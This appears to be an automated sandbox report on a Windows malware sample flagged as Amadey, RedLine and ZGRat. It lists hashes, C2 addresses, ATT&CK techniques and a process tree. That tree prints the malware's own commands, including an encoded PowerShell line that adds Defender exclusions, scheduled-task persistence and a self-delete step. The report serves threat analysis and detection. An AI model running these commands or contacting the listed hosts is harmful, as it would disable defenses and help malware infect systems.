amadey | 3c2e54cf5340c3b1c1a013e1748db7359339eb1280d73f7f3278eab8c40f7b63

Analysis

max time kernel
24s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
24-01-2024 04:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
Size

791KB
MD5

ec2c94a21a52027c229a7824d4a1c5ca
SHA1

b17aa25017bf7d0af7ffb946bcace0d51331d351
SHA256

cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e
SHA512

f44190b724851959ad712af3fecf4c397386b81a2c5f4258bd0b5ce028b173f29d57a296a448d1568d5de3eb25623f119cea3cabbee6c753890fe3e006df0761
SSDEEP

24576:Skt2zwjdnAwQ4x2K3yWds0JkKyV0+mZbmNrUCV+7d9/1:PnnAlpadsLK+mZSgfpF

Score

10^/10

amadey redline zgrat @pixelscloud @rlreborn cloud tg: @fatherofcarders)livetraffic discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

4.15

http://185.215.113.68

Attributes

install_dir
d887ceb89d
install_file
explorhe.exe
strings_key
7cadc181267fafff9df8503e730d60e1
url_paths
/theme/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

20.113.35.45:38357

Extracted

Family

redline

Botnet

@RLREBORN Cloud TG: @FATHEROFCARDERS)

141.95.211.148:46011

Extracted

Family

amadey

http://185.215.113.68

Attributes

strings_key
7cadc181267fafff9df8503e730d60e1
url_paths
/theme/index.php

rc4.plain

Extracted

Family

redline

Botnet

@PixelsCloud

94.156.67.176:13781

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 36 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2772-43-0x00000000051D0000-0x00000000052CC000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-44-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-45-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-53-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-65-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-69-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-71-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-85-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-91-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-95-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-101-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-103-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-99-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-97-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-93-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-89-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-87-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-83-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-81-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-79-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-77-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-75-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-73-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-67-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-63-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-61-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-59-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-57-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2480-359-0x0000000000DA0000-0x0000000000DFA000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-55-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-51-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-49-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
behavioral2/memory/2772-47-0x00000000051D0000-0x00000000052C7000-memory.dmp	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe	family_zgrat_v1
C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1956-152-0x0000000000400000-0x0000000000454000-memory.dmp	family_redline
behavioral2/memory/2224-251-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\1000563001\pixellslsss.exe	family_redline

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

83 1456 rundll32.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exe

pid process

4616 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
83	1456	rundll32.exe

pid	process
4616	netsh.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorhe.exeZjqkz.exeGzxzuhejdab.execfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	explorhe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Zjqkz.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	Gzxzuhejdab.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe

Executes dropped EXE 16 IoCs

Processes:

explorhe.exeZjqkz.exeConhost.exerdx1122.exeGzxzuhejdab.exeqemu-ga.exestore.exeWerFault.exeInstallSetup7.exeWerFault.exeBroomSetup.exe31839b57a4f11171d6abc8bbc4451ee4.exerty25.exeFirstZ.exeZjqkz.exekskskfsf.exe

pid	process
4888	explorhe.exe
2772	Zjqkz.exe
2092	Conhost.exe
4748	rdx1122.exe
2480	Gzxzuhejdab.exe
3204	qemu-ga.exe
1952	store.exe
2876	WerFault.exe
4696	InstallSetup7.exe
4880	WerFault.exe
3428	BroomSetup.exe
876	31839b57a4f11171d6abc8bbc4451ee4.exe
4920	rty25.exe
2968	FirstZ.exe
1084	Zjqkz.exe
1532	kskskfsf.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exeInstallSetup7.exe

pid process

1456 rundll32.exe
4696 InstallSetup7.exe
4696 InstallSetup7.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

explorhe.exe

pid process

4888 explorhe.exe
4888 explorhe.exe

pid	process
1456	rundll32.exe
4696	InstallSetup7.exe
4696	InstallSetup7.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Conhost.exerdx1122.exe

description	pid	process	target process
PID 2092 set thread context of 1956	2092	Conhost.exe	WerFault.exe
PID 4748 set thread context of 2224	4748	rdx1122.exe	WerFault.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
672	sc.exe
4996	sc.exe
688	sc.exe
5112	sc.exe
3736	sc.exe
4752	sc.exe
2692	sc.exe
3860	sc.exe
1220	sc.exe
452	sc.exe
516	sc.exe
3564	sc.exe
2340	sc.exe
4960	sc.exe
2716	sc.exe
1128	sc.exe
3708	sc.exe
4664	sc.exe
4744	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 48 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process
812	4880	WerFault.exe
2224	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3132	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
1984	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
1368	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
4512	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
5008	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2336	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3812	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3416	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3748	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
4596	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2860	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
1956	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2528	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3324	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
4344	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3056	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2316	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
1580	876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
4208	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2316	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2480	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
4336	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3896	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3808	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
1984	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
3472	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
2104	2820	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
5028	2528	WerFault.exe	csrss.exe
2016	2528	WerFault.exe	csrss.exe
4184	2528	WerFault.exe	csrss.exe
2972	2528	WerFault.exe	csrss.exe
4972	2528	WerFault.exe	csrss.exe
2876	2528	WerFault.exe	csrss.exe
528	2528	WerFault.exe	csrss.exe
856	2528	WerFault.exe	csrss.exe
2392	2528	WerFault.exe	csrss.exe
4960	2528	WerFault.exe	csrss.exe
2320	1084	WerFault.exe	nsfA097.tmp
2452	2528	WerFault.exe	csrss.exe
3884	2528	WerFault.exe	csrss.exe
2972	2528	WerFault.exe	csrss.exe
4200	2528	WerFault.exe	csrss.exe
1348	2528	WerFault.exe	csrss.exe
4688	2528	WerFault.exe	csrss.exe
3920	2528	WerFault.exe	csrss.exe
4040	2528	WerFault.exe	csrss.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WerFault.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WerFault.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

772 schtasks.exe
4372 schtasks.exe
1504 schtasks.exe
3108 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1240 timeout.exe

pid	process
772	schtasks.exe
4372	schtasks.exe
1504	schtasks.exe
3108	schtasks.exe

pid	process
1240	timeout.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

Gzxzuhejdab.exepowershell.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe

pid	process
2480	Gzxzuhejdab.exe
2480	Gzxzuhejdab.exe
744	powershell.exe
744	powershell.exe
744	powershell.exe
2224	WerFault.exe
2224	WerFault.exe
2224	WerFault.exe
2224	WerFault.exe
1956	WerFault.exe
1956	WerFault.exe
2224	WerFault.exe
2224	WerFault.exe
1956	WerFault.exe
1956	WerFault.exe
1956	WerFault.exe
1956	WerFault.exe
2224	WerFault.exe
4880	WerFault.exe
4880	WerFault.exe
3812	powershell.exe
3812	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

Zjqkz.exeGzxzuhejdab.exepowershell.exeWerFault.exeWerFault.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2772	Zjqkz.exe
Token: SeDebugPrivilege	2480	Gzxzuhejdab.exe
Token: SeDebugPrivilege	744	powershell.exe
Token: SeDebugPrivilege	1956	WerFault.exe
Token: SeDebugPrivilege	2224	WerFault.exe
Token: SeDebugPrivilege	3812	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exeexplorhe.exeBroomSetup.exe

pid process

4376 cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
4888 explorhe.exe
3428 BroomSetup.exe

pid	process
4376	cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
4888	explorhe.exe
3428	BroomSetup.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exeexplorhe.exeConhost.exerdx1122.exeZjqkz.exeGzxzuhejdab.exeWerFault.exeInstallSetup7.exe

description	pid	process	target process
PID 4376 wrote to memory of 4888	4376	cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe	explorhe.exe
PID 4376 wrote to memory of 4888	4376	cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe	explorhe.exe
PID 4376 wrote to memory of 4888	4376	cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe	explorhe.exe
PID 4888 wrote to memory of 772	4888	explorhe.exe	schtasks.exe
PID 4888 wrote to memory of 772	4888	explorhe.exe	schtasks.exe
PID 4888 wrote to memory of 772	4888	explorhe.exe	schtasks.exe
PID 4888 wrote to memory of 2772	4888	explorhe.exe	Zjqkz.exe
PID 4888 wrote to memory of 2772	4888	explorhe.exe	Zjqkz.exe
PID 4888 wrote to memory of 2772	4888	explorhe.exe	Zjqkz.exe
PID 4888 wrote to memory of 2092	4888	explorhe.exe	Conhost.exe
PID 4888 wrote to memory of 2092	4888	explorhe.exe	Conhost.exe
PID 4888 wrote to memory of 2092	4888	explorhe.exe	Conhost.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 2092 wrote to memory of 1956	2092	Conhost.exe	WerFault.exe
PID 4888 wrote to memory of 4748	4888	explorhe.exe	rdx1122.exe
PID 4888 wrote to memory of 4748	4888	explorhe.exe	rdx1122.exe
PID 4888 wrote to memory of 4748	4888	explorhe.exe	rdx1122.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4748 wrote to memory of 2224	4748	rdx1122.exe	WerFault.exe
PID 4888 wrote to memory of 2480	4888	explorhe.exe	Gzxzuhejdab.exe
PID 4888 wrote to memory of 2480	4888	explorhe.exe	Gzxzuhejdab.exe
PID 4888 wrote to memory of 2480	4888	explorhe.exe	Gzxzuhejdab.exe
PID 2772 wrote to memory of 744	2772	Zjqkz.exe	powershell.exe
PID 2772 wrote to memory of 744	2772	Zjqkz.exe	powershell.exe
PID 2772 wrote to memory of 744	2772	Zjqkz.exe	powershell.exe
PID 2480 wrote to memory of 3204	2480	Gzxzuhejdab.exe	qemu-ga.exe
PID 2480 wrote to memory of 3204	2480	Gzxzuhejdab.exe	qemu-ga.exe
PID 4888 wrote to memory of 1952	4888	explorhe.exe	store.exe
PID 4888 wrote to memory of 1952	4888	explorhe.exe	store.exe
PID 4888 wrote to memory of 1952	4888	explorhe.exe	store.exe
PID 4888 wrote to memory of 1456	4888	explorhe.exe	rundll32.exe
PID 4888 wrote to memory of 1456	4888	explorhe.exe	rundll32.exe
PID 4888 wrote to memory of 1456	4888	explorhe.exe	rundll32.exe
PID 4888 wrote to memory of 2876	4888	explorhe.exe	WerFault.exe
PID 4888 wrote to memory of 2876	4888	explorhe.exe	WerFault.exe
PID 4888 wrote to memory of 2876	4888	explorhe.exe	WerFault.exe
PID 2876 wrote to memory of 4696	2876	WerFault.exe	InstallSetup7.exe
PID 2876 wrote to memory of 4696	2876	WerFault.exe	InstallSetup7.exe
PID 2876 wrote to memory of 4696	2876	WerFault.exe	InstallSetup7.exe
PID 2876 wrote to memory of 4880	2876	WerFault.exe	WerFault.exe
PID 2876 wrote to memory of 4880	2876	WerFault.exe	WerFault.exe
PID 2876 wrote to memory of 4880	2876	WerFault.exe	WerFault.exe
PID 4696 wrote to memory of 3428	4696	InstallSetup7.exe	BroomSetup.exe
PID 4696 wrote to memory of 3428	4696	InstallSetup7.exe	BroomSetup.exe
PID 4696 wrote to memory of 3428	4696	InstallSetup7.exe	BroomSetup.exe
PID 2876 wrote to memory of 876	2876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 876	2876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 876	2876	WerFault.exe	31839b57a4f11171d6abc8bbc4451ee4.exe
PID 2876 wrote to memory of 4920	2876	WerFault.exe	rty25.exe
PID 2876 wrote to memory of 4920	2876	WerFault.exe	rty25.exe
PID 2876 wrote to memory of 2968	2876	WerFault.exe	FirstZ.exe
PID 2876 wrote to memory of 2968	2876	WerFault.exe	FirstZ.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4828 attrib.exe

pid	process
4828	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe
"C:\Users\Admin\AppData\Local\Temp\cfd185173a9199f41d4819c7479cd868f6d913b0ca02a37ef93a802939889a6e.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4376

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4888

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\Admin\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
3⤵
- Creates scheduled task(s)
PID:772

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
"C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAA1ADQANAAwADAAMQBcAFoAagBxAGsAegAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAWgBqAHEAawB6AC4AZQB4AGUAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABjAGwAbgB0AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABjAGwAbgB0AC4AZQB4AGUA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:744

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
4⤵
PID:228

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
4⤵
PID:4960

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
4⤵
PID:2860

C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
C:\Users\Admin\AppData\Local\Temp\1000544001\Zjqkz.exe
4⤵
- Executes dropped EXE
PID:1084

C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000545001\gold1234.exe"
3⤵
PID:2092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:1956

C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe
"C:\Users\Admin\AppData\Local\Temp\1000546001\rdx1122.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:2224

C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe
"C:\Users\Admin\AppData\Local\Temp\1000548001\flesh.exe"
3⤵
PID:2480

C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe
"C:\Users\Admin\AppData\Local\Temp\d887ceb89d\qemu-ga.exe"
4⤵
- Executes dropped EXE
PID:3204

C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe
"C:\Users\Admin\AppData\Local\Temp\1000552001\store.exe"
3⤵
- Executes dropped EXE
PID:1952

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
4⤵
PID:3112

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:1456

C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe
"C:\Users\Admin\AppData\Local\Temp\1000556001\latestrocki.exe"
3⤵
PID:2876

C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4696

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
6⤵
PID:1984

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
7⤵
- Creates scheduled task(s)
PID:4372

C:\Windows\SysWOW64\chcp.com
chcp 1251
7⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp
5⤵
PID:1084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 2420
6⤵
- Program crash
PID:2320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsfA097.tmp" & del "C:\ProgramData\*.dll"" & exit
6⤵
PID:4036

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
4⤵
- Executes dropped EXE
PID:876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 372
5⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 388
5⤵
- Program crash
PID:3132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 664
5⤵
- Program crash
PID:1984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 724
5⤵
- Program crash
PID:1368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 716
5⤵
- Program crash
PID:4512

C:\Windows\SysWOW64\WerFault.exe
